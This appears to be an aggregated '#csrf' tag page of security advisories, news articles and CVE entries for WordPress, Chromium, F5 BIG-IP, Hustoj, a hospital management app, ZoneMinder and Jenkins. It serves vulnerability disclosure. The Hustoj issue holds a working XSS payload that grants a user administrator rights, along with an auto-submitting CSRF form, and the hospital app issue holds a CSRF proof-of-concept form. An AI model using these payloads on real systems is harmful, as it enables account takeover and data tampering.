Debian Linux Security Advisory 5279-2 - Several vulnerabilities were discovered in Wordpress, a web blogging tool. They allowed remote attackers to perform SQL injection, create open redirects, bypass authorization access, or perform Cross-Site Request Forgery (CSRF) or Cross-Site Scripting (XSS) attacks. The wordpress package released in DSA-5279-1 had incorrect dependencies that could not be satisfied in Debian stable. This update corrects the problem.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5279-2                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondNovember 17, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : wordpressDebian Bug     : 1007005 1018863 1022575 1024249The wordpress package released in DSA-5279-1 had incorrectdependencies that could not be satisfied in Debian stable: this updatecorrects the problem. For reference, the original advisory text isprovided here again:  Several vulnerabilities were discovered in Wordpress, a web blogging  tool. They allowed remote attackers to perform SQL injection, create  open redirects, bypass authorization access, or perform Cross-Site  Request Forgery (CSRF) or Cross-Site Scripting (XSS) attacks.For the stable distribution (bullseye), this problem has been fixed inversion 5.7.8+dfsg1-0+deb11u2.We recommend that you upgrade your wordpress packages.For the detailed security status of wordpress please refer toits security tracker page at:https://security-tracker.debian.org/tracker/wordpressFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmN13KoACgkQEL6Jg/PVnWSnyggAvAS8Crzgp8xW8FvZ20pEz0uXm8oW+5sUR7U+c6vsUPXBa2yT+pLNyCGnSs9ffvl+IVnfZEHK70PvK61thKS9yhtse0fy25HljMnsBBSzMtjZEwZOHGpERNRWYf7Cm5ubIlKumKLodGh+Ecun01DRawfG/W4V+sBnDZWGdn9+B9K6q7vYLRDowshisdJczvrRn2vr88V+LLzbgVDv3M1WcM+dbyEOOtxY29ELuHODgafZNIiMyjxpy3RIiZg5c2uS4RxojN61TxKpD2ewdSRrqAy51SspUSMZIV9l2hQkhMfOm/8x1MLAWVO0v/PaS8NsyR1P454NCwhRRmNbJ5252w==hTKc-----END PGP SIGNATURE-----

Debian Security Advisory 5279-2

A case study on the complexity of browser security

A case study on the complexity of browser security

  

Malicious actors can stage cross-site scripting (XSS) attacks across the subdomains of a website if they can trick users of Chromium browsers into entering a simple JavaScript command in the developer console.

This is according to the findings of security researcher Michał Bentkowski who presented his findings in a blog post published yesterday (November 16) titled Google Roulette.

While the bug is hard to exploit and Google has decided not to patch it, it is an interesting case study on the complexities of browser security.

**Same-origin policy, site isolation**

Chromium browsers have several safeguards to prevent XSS attacks. The Same-Origin policy feature prevents scripts in one browser tab from accessing cookies and data from another domain.

The Site Isolation feature, on the other hand, gives a separate process to each domain to prevent different websites from accessing each other’s memory space in the browser.

However, it is worth noting that Same-Origin and Site Isolation do not apply to subdomains.

Therefore, two browser tabs that are on, say, https://workspace.google.com and https://developer.google.com will run on the same process and are considered to be of the same origin (google.com).

**Developer console scripts**

The browser’s protection mechanisms apply not only to on-page scripts but also to scripts running in the browser’s developer console. However, the developer console has access to certain extra functions that are not available to on-page scripts.

One of these functions is , which sets breakpoints on specific events, such as when a function is called.

Two things are interesting about . First, it has an optional argument that allows you to replace the breakpoint functionality with a custom JavaScript code. And second, when you use the developer console to define a event on a webpage, it persists across page refreshes and even carries to other subdomains of the same origin in the same tab.

DON’T MISS CSRF in Plesk API enabled server takeover

How does lead to XSS? First, Bentkowski set up a page that contained two malicious functions.

The first one is the XSS payload, which iterates across the subdomains of the current origin and runs a proof-of-concept script (in this case an popup).

The second one is a getter function called that defines a event for the function (which happens many times during a page load) and reloads the page.

Since needs to be explicitly called from the developer console, the page displays a message that prompts the user to call from the developer console. After that, the XSS cycle is triggered and goes through any number of subdomains defined in the payload function.

A video containing a proof-of-concept can be found here.

**Impact and fix**

“I see it more as an interesting technical bug than something exploitable in the real world,” Bentkowski told The Daily Swig. “In my opinion, the user interaction required by this attack makes it not really feasible for attackers.”

There are, however, two scenarios where this bug can become concerning, according to Bentkowski.

First are websites where users can create their own subdomains. In this case, a user can create a malicious page and trick visitors into triggering the XSS function on their own subdomain.

Read more of the latest browser security news

A second scenario is when there is an XSS vulnerability on one subdomain and the attacker wants to escalate it to others through the developer console.

Bentkowski reported the bug in 2020 and Google has apparently decided not to fix it. “The issue isn’t currently assigned to anyone so it doesn’t look like we can expect the patch soon,” Bentkowski said.

However, Google agreed to allow Bentkowski to make his findings public, telling him that since the bug is no longer exploitable via Chrome Extensions, it is no longer a security issue.

“I still think that there might be some ways to escalate it that I failed to discover, and maybe you, my dear readers, will have some better ideas,” Bentkowski wrote on his blog.

YOU MIGHT ALSO LIKE Mastodon users vulnerable to password-stealing attacks

Google Roulette: Developer console trick can trigger XSS in Chromium browsers

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems.
Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints.
The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems.

Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints.

The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

*   **CVE-2022-41622** (CVSS score: 8.8) - A cross-site request forgery (CSRF) vulnerability through iControl SOAP, leading to unauthenticated remote code execution.
*   **CVE-2022-41800** (CVSS score: 8.7) - An iControl REST vulnerability that could allow an authenticated user with an Administrator role to bypass Appliance mode restrictions.

"By successfully exploiting the worst of the vulnerabilities (CVE-2022-41622), an attacker could gain persistent root access to the device's management interface (even if the management interface is not internet-facing)," Rapid7 researcher Ron Bowes said.

However, it's worth noting that such an exploit requires an administrator with an active session to visit a hostile website.

Also identified were three different instances of security bypass, which F5 said cannot be exploited without first breaking existing security barriers through a previously undocumented mechanism.

Should such a scenario arise, an adversary with Advanced Shell (bash) access to the appliance could weaponize these weaknesses to execute arbitrary system commands, create or delete files, or disable services.

While F5 has made no mention of any of the vulnerabilities being exploited in attacks, it's recommended that users apply the necessary patches to mitigate potential risks.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

Hustoj 22.09.22 has a XSS Vulnerability in /admin/problem_judge.php.

**描述问题**  
XSS Vulnerability exists in  

echo $row\['input\_text'\]."\\n";

  
**如何复现**  
Steps to reproduce the behavior:

1.  POST text with xss script to submit.php  
    for example:

id=-1000&language=1&source=asdasdasdasdasd&input\_text=<script src\="/template/bs3/jquery.min.js"\></script\><script\>$.get("/admin/privilege\_add.php").done(function(data){
    re\=/name="postkey" value="(\[\\w\]%2B?)"/g;
    $.post("/admin/privilege\_add.php",{"postkey":re.exec(data)\[1\],"user\_id":"username","rightstr":"administrator","valuestr":"true"
                                  ,"do":"do","do":"do","csrf":"tV8EG8W5AsFY0JCKoBStoHC2v30NrDe5"}).done(function (data) {console.log(data)})
})
</script\>

Then you can get a sid.  

2.  Send malicious links to administrators  
    example:

<body\>
<script type\="text/javascript"\>
    function post(URL, PARAMS) {
    var temp \= document.createElement("form");
    temp.action \= URL;
    temp.method \= "post";
    temp.style.display \= "none";
    for (var x in PARAMS) {
        var opt \= document.createElement("textarea");
        opt.name \= x;
        opt.value \= PARAMS\[x\];
        temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    return temp;
}
post("http://192.168.0.25:8080/admin/problem\_judge.php",{"sid":"1018","pid":"1000","result":"4","time":"500","memory":"1024","sim":"100","simid":"0","filename":"1000%2Ftest.in","gettestdatalist":"do","getcustominput":"1"})

</script\>
</body\>

CVE-2022-42187: XSS Vulnerability in /admin/problem_judge.php · Issue #866 · zhblue/hustoj

Doufox 0.0.4 contains a CSRF vulnerability that can add system administrator account.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-42246: CSRF vulnerability adding system administrator account · Issue #1 · farliy-hacker/Doufoxcms

Widespread exploitation deemed ‘unlikely’ given hurdles

Adam Bannister 16 November 2022 at 15:02 UTC  
Updated: 16 November 2022 at 15:06 UTC

Widespread exploitation deemed ‘unlikely’ given hurdles

Security vendor F5 has prepared hotfixes for a pair of vulnerabilities affecting its BIG-IP and BIG-IQ networking devices that could result in remote code execution (RCE).

Software updates containing patches are also in the pipeline for the bugs, which despite potentially severe outcomes have significant barriers to exploitation.

F5 has assigned the most severe of the flaws a ‘high’ severity CVSS score of 8.8, but Rapid7 said this isn’t a “drop everything to fix” situation.

**CSRF to RCE**

The vulnerability (CVE-2022-41622) leaves BIG-IP and BIG-IQ vulnerable to unauthenticated RCE via cross-site request forgery (CSRF) because Big-IP’s SOAP API lacked CSRF protection and other typical SOAP API defenses, according to a blog post published today (November 16) by Ron Bowes, lead security researcher at Rapid7.

The attack “can grant persistent root access to the device’s management interface”, even when this interface is not internet-facing (as is recommended).

However, “that requires a confluence of factors to actually be exploitable (an administrator with an active session would need to visit a hostile website, and an attacker would have to have some knowledge of the target network)”, said Bowes.

Read more of the latest enterprise security news

If these prerequisites are met, miscreants can make arbitrary SOAP commands against the API within the authenticated user’s session.

Bowes, who uncovered the flaws, said “several of the exploit paths require SELinux bypasses” – which he duly found.

The second issue, tracked as CVE-2022-41800, means iControl REST is vulnerable to RCE via RPM spec injection. However, Bowes considers the risk “low” given iControl REST is only vulnerable in appliance mode and attackers must be authenticated as administrators.

**Exploit chain**

Bowes also uncovered a trio of security control bypasses “that F5 does not consider vulnerabilities” but nevertheless have “a reasonable attack surface” for use as part of an exploit chain.

He said F5 had addressed a SELinux bypass arising through command injection in an update script but declined to assign a CVE.

“We disagree with their assessment because SELinux is a security boundary,” said Bowes.

“We’d normally consider this to be a very low-risk vulnerability, but because we used it as part of the exploit chain to turn CVE-2022-41622 into code execution, we believe it is important.”

Bowes also found a SELinux bypass via incorrect file context and a local privilege escalation via inadequate UNIX socket permissions.

RECOMMENDED BIG-IP: Proof-of-concept released for RCE vulnerability in F5 network management tool

F5 told The Daily Swig:  

“As noted by Rapid7, there is no known way to exploit these issues without first bypassing existing security controls using an unknown or undiscovered mechanism. We know of no way in which an attacker would be able to take advantage of these issues at this time and therefore do not consider them vulnerabilities and did not issue CVEs.

“F5 is evaluating these issues as part of a defense-in-depth approach and will look to address them in future releases. We recommend customers adhere to security best practices to reduce any risk should design or threat models change in the future.”

**Hotfixes, patches**

F5 added: “We recommend customers check the security advisories on AskF5 to assess their exposure and get details on recommended mitigations. Engineering hotfixes are available on request for both CVEs, and these fixes will be included in future releases as quickly as possible.” 

At the time of disclosure, F5 is apparently not aware of any active exploitation of the vulnerabilities. Rapid7 believes “widespread exploitation” is “unlikely”.

DON’T MISS Zendesk Explore flaws opened the door to account pillage

F5 fixes high severity RCE bug in BIG-IP, BIG-IQ devices

A vulnerability classified as problematic was found in Hospital Management Center. Affected by this vulnerability is an unknown functionality of the file appointment.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-213787.

**Build environment: Aapche2.4.39; MySQL5.7.26； PHP7.3.4****1.Vulnerability analysis**

On the page appointment. php, the input information is submitted to the appointment connect. php through the POST request. The follow-up code is displayed in the appointment connect PHP page, the 16th line of code - the 29th line of code, the information entered by the user is assigned to the corresponding variable, and then inserted into the database, and the program judges if mysqli\_ If the query is executed successfully, the data is successfully inserted into the database.
The user login status is not verified, so CSRF vulnerability is caused

POC:

<html\>
  
  <body\>
  <script\>history.pushState('', '', '/')</script\>
    <form action\="http://vulhms.test/appointmentconnect.php" method\="POST"\>
      <input type\="hidden" name\="Patient&#95;Name" value\="ace" />
      <input type\="hidden" name\="Doctor&#95;Name" value\="ace" />
      <input type\="hidden" name\="Department" value\="ace" />
      <input type\="hidden" name\="App&#95;Date" value\="2022-11-15" />
      <input type\="hidden" name\="App&#95;Time" value\="00:00:00.000000" />
      <input type\="hidden" name\="Phone" value\="ace" />
      <input type\="hidden" name\="save" value\="submit" />
      <input type\="submit" value\="Submit request" />
    </form\>
  </body\>
</html\>

The POC clicks Send, and then a piece of information about the user's ace will be added to the database

In the docker list interface, we can also see that a new West Sydney user named ace has been added

CVE-2022-4013: CSRF vulnerability · Issue #2 · golamsarwar08/hms

Session fixation exists in ZoneMinder through 1.36.12 as an attacker can poison a session cookie to the next logged-in user.

**The Memory Remains 1.36.31**

**Changes since 1.36.30**

*   Fix failed login due to remoteAddr not being populated in session after regeneration
*   Use REQUEST instead of SESSION to store the post login redirect because we clear the session on login. Fixes \[#3517\]
*   Turn off logging of deprecation notices so that we work with php8.2

**Full Changelog**: 1.36.30...1.36.31

**The Memory Remains 1.36.30**

**What's Changed**

*   Test for definition of ZM\_LOG\_INJECT. We don't include the config when not logged in. So it won't be defined and an error will be logged
*   Fix saving from the function modal (and other modals)
*   left align option value column
*   when a config value is overridden via \*.conf files, put up a warning/explanation on the options view
*   Turn failure to send into a debug instead of warn. When running under fpm etc we may not get SIGPIPE.
*   Move relevant code out of includes/actions/auth.php into includs/auth.php. Fixes inability to login using GET method.
*   Don't panic if no font file found. We seem to be able to continue without it.
*   Rework session handling to fix breakage with php8.2. Please note that php 8.2 still completely breaks a ton of our code. Do not upgrade to php8.2 and expect ZoneMinder to work.

**Full Changelog**: 1.36.29...1.36.30

**The Memory Remains 1.36.29**

#Changes since 1.36.28

*   update web/ajax.log.php to contents from master. Fixes errors causing log view to not work. Fixes \[#3606\]
*   use ajax() instead of getJSON so that we can specify no timeouts.. This prevents log queries from stacking up overloading the db
*   Check for definition of CAMBOZOLA defines. The purpose is just to ease running the 1.36 UI against a 1.37 database.
*   Added option ZM\_AUTH\_CASE\_INSENSITIVE\_USERNAMES to match mixed case Usernames to lower case usernames in database \[#3516\]
*   Move LIBAVCODEC\_VERSION\_CHECK so that it is defined when the include files are under ffmpeg. Maybe fixes build with 5.1.2?
*   Test for matches\[operator\]. Fixes \[#3607\]

**Full Changelog**: 1.36.28...1.36.29

**The Memory Remains 1.36.28**

#Changes since 1.36.27

*   Add ZM\_LOG\_INJECT config parameter to disable unprivileged log injection through api.
*   Check value of System:Edit permission and ZM\_LOG\_INJECT to disable ajax log injection.
*   Use canEdit\['System'\] and value of new ZM\_LOG\_INJECT to disable attempting to inject javascript errors into zm logs
*   The above 3 Fixes GHSA-cfcx-v52x-jh74
*   Fix Monitor => monitor in zmwatch causing crash in zmwatch
*   update storage modal to fix buttons not being in form. Also remove duplicate view field and make button action be save instead of Save. Fixes \[#3605\]

**Full Changelog**: 1.36.27...1.36.28

**The Memory Remains 1.36.27**

#Changes since 1.36.26

*   Use zm\_setcookie, which will automatically set samesite on the session cookie. Maybe fixes \[#3517\]
*   commit to free up locks when there is an error doing MoveTo (like does not exist on disk). Also remove commit from CopyTo which does no transactions/locking.
*   Use y instead of Y for path generation when using Deep scheme. Fixes \[#3583\]
*   Add spans and title attributes on the title h2 parts of frame view so that on mouseover it tells you what the numbers are
*   Update frame view js to use const etc instead of var. Put back EventId and FrameId in stats being links and fix FrameId not being populated. If no stats available disable the stats button and use the title to explain why.
*   In failure state populate imageData array to reduce output php errors in frame view
*   Add connkey and semaphore key to logging about failure to get semaphore. Add sem\_release before every ajaxError call because ajaxError exits and so we never release the semaphore.
*   fix not saving v4l settings.
*   Only warn about event exceeding section\_length if we are not using close\_mode=TIME. Fixes \[#3599\]
*   make OutputCodec work in API Maybe fixes \[#3341\]
*   Handle filter\[query\] not being defined
*   Fix export not working for filter due to limit set to 0.
*   Only look for action if there is a view. Prevents lookup of a non-existent file.
*   Include monitor Id in zmwatch logs, for consistency as well as utility
*   Escape File parameters when inserting log to prevent XSS. Related to fixing \[#2466\]. Fixes https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-h6xp-cvwv-q433
*   Only perform actions on post. Doing them on GET allows doing actions without CSRF from things like img tags which is not good. Fixes GHSA-xgv6-qv6c-399q
*   Upgrade jquery to 3.6.1
*   Update jquery-ui to 1.13.2 to remove reported dependency advisory
*   Fix missing STATE\_UNKNOWN in perl libs causing missed events in zmes.
*   Add permissions checking to API/Logs. Fixes unprivileged user being to add/edit/delete/view logs. Fixes GHSA-mpcx-3gvh-9488

**Full Changelog**: 1.36.26...1.36.27

**The Memory Remains 1.36.26**

#Changes since 1.36.25

*   Fix \[#3580\] Export page broken due to type on dateTimeFormater => dateTimeFormatter
*   Restore the integer value returned for status on API MonitorsController to per 1.36.16 value. The values got shifted due to making 0 = Unknown instead of -1.
*   Only init the bootstrap table of events on watch view if the user has permission to view events. This prevents endless logging of insufficient permissions errors.
*   Add fade to the logout modal which for some reason fixes it not showing after a cancel
*   Specify that only main page content tables should have the first column be min-width: 300px. This was affecting the logout dialog table content when viewing the monitor edit view.
*   fix export from event view
*   Only try to set TIMEZONE when loading dateTimeFormatter if it is set and handle the exception when any of TIMEZONE or LOCALE are invalid.
*   Fix values in LOCALE\_DEFAULT dropdown in options.
*   Add libio-interface-perl to dependencies. Fixes \[#3577\]
*   Show the Reboot control when it is enabled without wake, sleep or reset.

**Full Changelog**: 1.36.25...1.36.26

**The Memory Remains 1.36.25**

**Changes since 1.36.24**

*   add build for ubuntu kinetic
*   fix javascript error on zone edit
*   fix deprecation error on php8 due to implicit conversion to integer when displaying event duration
*   Update ZM\_MIN\_RTSP\_PORT description
*   fix some javascript errors during page transition
*   Ignore errors when decoding log message
*   add detection of out of order packets from ffmpeg
*   Keep track of max\_keyframe\_interval and log it when complaining
*   fix hang during logrotate due to waiting in packetqueue for decode
*   Remove warning about maxImageBuffer. Will be handled better in queuePacket.
*   Fix snapshot jpeg not being created early enough
*   finally fix (we think) hung zmu/zms processes due to race in db thread creation.
*   Update material icons to v1.11.10
*   Add a button to event view to jump to this event time in montage review
*   fix different button heights when using font awesome vs material icons
*   Add a back to frames button from frame view
*   Use HTTP\_X\_FORWARDED\_HOST or HTTP\_X\_FORWARDED\_SERVER if present to get correct hostname to use when behind a reverse proxy.
*   Handle case where time\_base is not set in the codec. Fixes h265 not playing through zms
*   When there are less than 3 storage areas, just list them in the header instead of making it a dropdown
*   fix problems with migrateHash

**Full Changelog**: 1.36.24...1.36.25

**The Memory Remains 1.36.24**

**The Memory Remains 1.36.23**

**WARNING: This release is flawed. Do not use. 1.36.24 is coming soon.**

**Changes since 1.36.22**

*   Fix failed build
*   set timezone when initializing IntlDateFormatter

**Full Changelog**: 1.36.22...1.36.23

**The Memory Remains 1.36.22**

**WARNING: This release is flawed. It will not compile. Do not use. 1.36.24 is coming soon.**

**Changes since 1.36.21**

*   Make proportional zoom and movement work for AxisV2 API
*   remove padding from ptz buttons making proportional zoom/pan not work right
*   Fix memleak
*   reduce debugging calls
*   include reorder\_queue\_size setting in warning about out of order dts
*   Sync up with c++ shm alignment to fix same size on 32bit
*   improve warning about MaxImageBuffer size being smaller than keyframe interval
*   Fix ever increasing duration in event list
*   fix javascript console log about leaflet not being installed
*   Fix event listing for filter involving AlarmedZone rule.
*   Fix logic inversion causing Filters involving DiskPercent rules to still hit the database
*   Fix too much logging about finding locked packets
*   Fix segfault when audio stream is present but not being recorded
*   when a new auth hash is generated, don't reload the image stream, just update the global var to be used if the image stream breaks.

**Full Changelog**: 1.36.21...1.36.22

CVE-2022-30769: Releases · ZoneMinder/zoneminder

Jenkins SourceMonitor Plugin 0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2022-45396: Jenkins Security Advisory 2022-11-15

A missing permission check in Jenkins CloudBees Docker Hub/Registry Notification Plugin 2.6.2 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.

Tag

#csrf